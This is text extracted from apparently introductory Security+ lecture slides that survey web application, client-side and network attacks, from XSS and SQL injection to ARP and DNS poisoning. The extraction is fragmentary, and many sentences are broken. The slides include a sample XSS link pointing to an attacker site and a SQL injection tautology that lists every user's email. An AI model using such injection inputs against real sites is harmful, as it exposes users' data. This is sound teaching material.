Professional Documents
Culture Documents
Objectives
2
List and explain the different types of Web application attacks Define client-side attacks Explain how a buffer overflow attack works List different types of denial of service attacks Describe interception and poisoning attacks
Application Attacks
3
continues to grow Web application attacks Client-side attacks Buffer overflow attacks Zero day attacks
Exploit
Web applications an essential element of organizations today Approach to securing Web applications
Hardening
Hardening
the web server operating system, and system services from other attacks, e.g. DDOs, BUT do not prevent attacks against application server.
Protecting
Network
the network
security devices can block the traditional attacks but not the Web app server, simply they ignore the content of the HTTP traffic
scripting ( or recently called, Java scripting injections) SQL injection XML injection Command injection / directory traversal
attacks at clients, not direct attack on the web app server to deface it.
The web browser execute any code sent from the web site in the form of JS, HTML , Adobe Flash
10
Figure 3-4 Bookmark page that accepts user input without validating and provides unencoded response
Cengage Learning 2012
For the example below, a web application that allows friends to share their favorite Bookmarks User enter their Name, a description and a URL of a bookmark.
Then uses a personalized Thank you screen The Name the user input is part of the code segment Attacker can use this in an XSS attack Attacker can enter a malicious code into the Name field Then that command can be executed in the victim machine when a victim is tricked in clicking to malicious link page Example of the malicious link is : http://fakesite.com/login.asp?serviceName=fakesite.comacce ss&templatename=pro_sel.forte&source=fakeimg.srcc=htt p://www.attacker_site.com/ this link to attacker web page
12
SQL Injection
13
SQL Injection
14
Attacker enters email field in SQL statement, where all the emails will be listed. Statement processed by the database Instead of entering a user name the attacker will send a statement as
Instead of entering a username, the attacker will enter whatever or a=a, so the statement will look like
SELECT fieldlist FROM table WHERE field = whatever or a=a whatever: can be any meaningless Or either of the conditions is true a=a: the statement is always true Therfore the statement will be read as SELECT fieldlist FROM table Last all users email will then be displayed
XML Injection
18
Markup language
Method
HTML
Uses
XML
Carries
XML attack
Similar
to SQL injection attack Attacker discovers Web site that does not filter user data Injects XML tags and data into the database
Xpath injection
Specific
type of XML injection attack Attempts to exploit XML Path Language queries
Web server users typically restricted to root directory Users may be able to access subdirectories:
But
can be used to enter text-based commands Passwd (Linux) contains user account information
Security+ Guide to Network Security Fundamentals, Fourth Edition
advantage of software vulnerability Attacker moves from root directory to restricted directories
Client-Side Attacks
22
Web application attacks are server-side attacks Client-side attacks target vulnerabilities in client applications
Interacting
with a compromised server Client initiates connection with server, which could result in an attack
Drive-by download
Client
computer compromised simply by viewing a Web page Attackers inject content into vulnerable Web server
Gain
Attackers
detection Embed an HTML document inside main document Clients browser downloads malicious script Instructs computer to download malware Security+ Guide to Network Security Fundamentals, Fourth Edition
Header manipulation
HTTP
header contains fields that characterize data being transmitted Headers can originate from a Web browser
Browsers
do not normally allow this Attackers short program can allow modification
can modify this field to hide fact it came from another site Modified Web page hosted from attackers computer
Accept-language
Some
Web applications pass contents of this field directly to database Attacker could inject SQL command by modifying this header
Security+ Guide to Network Security Fundamentals, Fourth Edition
Web sites use cookies to identify repeat visitors Examples of information stored in a cookie
Travel
Web sites may store users travel itinerary Personal information provided when visiting a site
First-party cookie
Cookie
visiting
Third-party cookie
Site
advertisers place a cookie to record user preferences in RAM and expires when browser is
Session cookie
Stored
closed
Security+ Guide to Network Security Fundamentals, Fourth Edition
Persistent cookie
Recorded
Secure cookie
Used
only when browser visits server over secure connection Always encrypted
Flash cookie
Uses
more memory than traditional cookie Cannot be deleted through browser configuration settings See Project 3-6 to change Flash cookie settings
be stolen and used to impersonate user Used to tailor advertising Can be exploited by attackers
Security+ Guide to Network Security Fundamentals, Fourth Edition
Session hijacking
Attacker
Malicious add-ons
Browser
extensions provide multimedia or interactive Web content Active X add-ons have several security concerns
31
attempts to store data in RAM beyond boundaries of fixed-length storage buffer Data overflows into adjacent memory locations May cause computer to stop functioning Attacker can change return address
Redirects
code
33
Network Attacks
34
utility used to send large number of echo request messages Overwhelms Web server
Smurf
Ping
attack
request with originating address changed Appears as if target computer is asking for response from all computers on the network
Security+ Guide to Network Security Fundamentals, Fourth Edition
Network Attacks
35
flood attack
Takes
uses many zombie computers in a botnet to flood a device with requests Virtually impossible to identify and block source of attack
Security+ Guide to Network Security Fundamentals, Fourth Edition
36
Interception
37
Man-in-the-middle
Interception
of legitimate communication Forging a fictitious response to the sender Passive attack records transmitted data Active attack alters contents of transmission before sending to recipient
Replay attacks
Similar
Interception (contd.)
38
Example:
server Later sends original, valid message to server Establishes trust relationship between attacker and server
Security+ Guide to Network Security Fundamentals, Fourth Edition
Poisoning
39
ARP poisoning
Attacker
Poisoning (contd.)
40
Poisoning (contd.)
41
DNS poisoning
Domain
Name System is current basis for name resolution to IP address DNS poisoning substitutes DNS addresses to redirect computer to another device
42
Privilege escalation
Exploiting
software vulnerability to gain access to restricted data Lower privilege user accesses functions restricted to higher privilege users User with restricted privilege accesses different restricted privilege of a similar user
44
Transitive access
Attack
involving a third party to gain access rights Has to do with whose credentials should be used when accessing services
Different
Summary
45
Web application flaws are exploited through normal communication channels XSS attack uses Web sites that accept user input without validating it
Uses
Summary (contd.)
46
Session hijacking
Attacker
user
Denial of service attack attempts to overwhelm system so that it cannot perform normal functions In ARP and DNS poisoning, valid addresses are replaced with fraudulent addresses Security+ Guide to Network Security Fundamentals, Fourth Edition Access rights and privileges may also be